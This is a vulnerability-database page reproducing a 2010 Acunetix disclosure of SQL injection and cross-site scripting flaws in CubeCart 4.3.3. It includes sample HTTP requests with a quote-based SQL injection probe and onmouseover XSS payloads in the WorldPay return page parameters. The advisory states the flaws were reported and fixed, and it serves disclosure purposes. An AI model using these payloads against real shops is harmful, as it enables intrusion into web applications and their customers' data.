Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

CubeCart 4.3.3 SQL Injection / Cross Site Scripting

🗓️ 11 Sep 2010 00:00:00Reported by Bogdan CalinType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 22 Views

Security vulnerabilities found in CubeCart 4.3.3, including SQL injection and Cross-site Scripting in different parameters

Code
`We are continuing with the list of security vulnerabilities found in a  
number of web applications while testing our latest version of Acunetix  
WVS v7 . In this blog post, we will look into the details of a number of  
security problems discovered by Acunetix WVS in CubeCart.  
  
"CubeCart is a fully featured ecommerce shopping cart solution used by  
over a million store owners around the world."  
  
The following web vulnerabilities were found in CubeCart version 4.3.3;  
  
1.SQL injection in “/cubecart_4/index.php”, parameter “searchStr”.  
2.Cross-site Scripting vulnerability in  
“/cubecart_4/modules/gateway/WorldPay/return.php”, parameter “amount”.  
3.Cross-site Scripting vulnerability in  
“/cubecart_4/modules/gateway/WorldPay/return.php”, parameter “cartId”.  
4.Cross-site Scripting vulnerability in  
“/cubecart_4/modules/gateway/WorldPay/return.php”, parameter “email”.  
5.Cross-site Scripting vulnerability in  
“/cubecart_4/modules/gateway/WorldPay/return.php”, parameter “transId”.  
6.Cross-site Scripting vulnerability in  
“/cubecart_4/modules/gateway/WorldPay/return.php”, parameter “transStatus”.  
  
Technical details about each web vulnerability are below:  
  
1. SQL injection in “/cubecart_4/index.php”, parameter “searchStr”.  
  
Additional details:  
SQL query:  
SQL:  
SELECT id FROM cube_CubeCart_search WHERE searchstr='''  
  
Sample HTTP Request:  
GET /cubecart_4/index.php?_a=viewCat&searchStr='&Submit=Go HTTP/1.1  
Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c  
Acunetix-Aspect: enabled  
Cookie: PHPSESSID=7c970bfe00c50261d25166dbab43c294;  
ccUser=7c970bfe00c50261d25166dbab43c294  
Host: webapps7:80  
Connection: Keep-alive  
Accept-Encoding: gzip,deflate  
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR  
1.1.4322)  
  
2. Cross-site Scripting vulnerability in  
“/cubecart_4/modules/gateway/WorldPay/return.php”, parameter “amount”.  
  
Attack details  
URL encoded GET input amount was set to ” onmouseover=prompt(949088) bad=”  
The input is reflected inside a tag element between double quotes.  
  
Sample HTTP Request:  
GET  
/cubecart_4/modules/gateway/WorldPay/return.php?amount=%22%20onmouseover%3dprompt%28949088%29%20bad%3d%22&cartId=&email=&transId=&transStatus=  
HTTP/1.1  
Cookie: PHPSESSID=7c970bfe00c50261d25166dbab43c294;  
ccUser=7c970bfe00c50261d25166dbab43c294  
Host: webapps7:80  
Connection: Keep-alive  
Accept-Encoding: gzip,deflate  
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR  
1.1.4322)  
  
3. Cross-site Scripting vulnerability in  
“/cubecart_4/modules/gateway/WorldPay/return.php”, parameter “cartId”  
  
Attack details  
URL encoded GET input cartId was set to ” onmouseover=prompt(932890) bad=”  
The input is reflected inside a tag element between double quotes.  
  
Sample HTTP Request:  
GET  
/cubecart_4/modules/gateway/WorldPay/return.php?amount=&cartId=%22%20onmouseover%3dprompt%28934178%29%20bad%3d%22&email=&transId=&transStatus=  
HTTP/1.1  
Cookie: PHPSESSID=7c970bfe00c50261d25166dbab43c294;  
ccUser=7c970bfe00c50261d25166dbab43c294  
Host: webapps7:80  
Connection: Keep-alive  
Accept-Encoding: gzip,deflate  
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR  
1.1.4322)  
  
4. Cross-site Scripting vulnerability in  
“/cubecart_4/modules/gateway/WorldPay/return.php”, parameter “email”.  
  
Attack details  
URL encoded GET input email was set to ” onmouseover=prompt(908306) bad=”  
The input is reflected inside a tag element between double quotes.  
  
Sample HTTP Request:  
GET  
/cubecart_4/modules/gateway/WorldPay/return.php?amount=&cartId=&email=%22%20onmouseover%3dprompt%28908306%29%20bad%3d%22&transId=&transStatus=  
HTTP/1.1  
Cookie: PHPSESSID=7c970bfe00c50261d25166dbab43c294;  
ccUser=7c970bfe00c50261d25166dbab43c294  
Host: webapps7:80  
Connection: Keep-alive  
Accept-Encoding: gzip,deflate  
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR  
1.1.4322)  
  
  
5. Cross-site Scripting vulnerability in  
“/cubecart_4/modules/gateway/WorldPay/return.php”, parameter “transId”.  
  
Attack details  
URL encoded GET input transId was set to ” onmouseover=prompt(998313) bad=”  
The input is reflected inside a tag element between double quotes.  
  
Sample HTTP Request:  
GET  
/cubecart_4/modules/gateway/WorldPay/return.php?amount=&cartId=&email=&transId=%22%20onmouseover%3dprompt%28998313%29%20bad%3d%22&transStatus=  
HTTP/1.1  
Cookie: PHPSESSID=7c970bfe00c50261d25166dbab43c294;  
ccUser=7c970bfe00c50261d25166dbab43c294  
Host: webapps7:80  
Connection: Keep-alive  
Accept-Encoding: gzip,deflate  
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR  
1.1.4322)  
  
6. Cross-site Scripting vulnerability in  
“/cubecart_4/modules/gateway/WorldPay/return.php”, parameter “transStatus”.  
  
Attack details  
URL encoded GET input transStatus was set to ”  
onmouseover=prompt(923101) bad=”  
The input is reflected inside a tag element between double quotes.  
  
Sample HTTP Request:  
GET  
/cubecart_4/modules/gateway/WorldPay/return.php?amount=&cartId=&email=&transId=&transStatus=%22%20onmouseover%3dprompt%28923101%29%20bad%3d%22  
HTTP/1.1  
Cookie: PHPSESSID=7c970bfe00c50261d25166dbab43c294;  
ccUser=7c970bfe00c50261d25166dbab43c294  
Host: webapps7:80  
Connection: Keep-alive  
Accept-Encoding: gzip,deflate  
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR  
1.1.4322)  
  
These vulnerabilities were reported to the CubeCart team on 22/7/2010  
via the support system on their website and they were fixed in latest  
version of CubeCart . If you are using CubeCart, download the latest  
version from their website.  
  
--   
Bogdan Calin - bogdan [at] acunetix.com  
CTO  
Acunetix Ltd. - http://www.acunetix.com  
Acunetix Web Security Blog - http://www.acunetix.com/blog  
Follow us on Twitter - http://www.twitter.com/acunetix  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
11 Sep 2010 00:00Current
0.2Low risk
Vulners AI Score0.2
cubecart 4.3.3sql injectioncross-site scriptingweb vulnerabilitiesacunetix wvsecommerce shopping cartworldpayhttp requestcookie vulnerability
22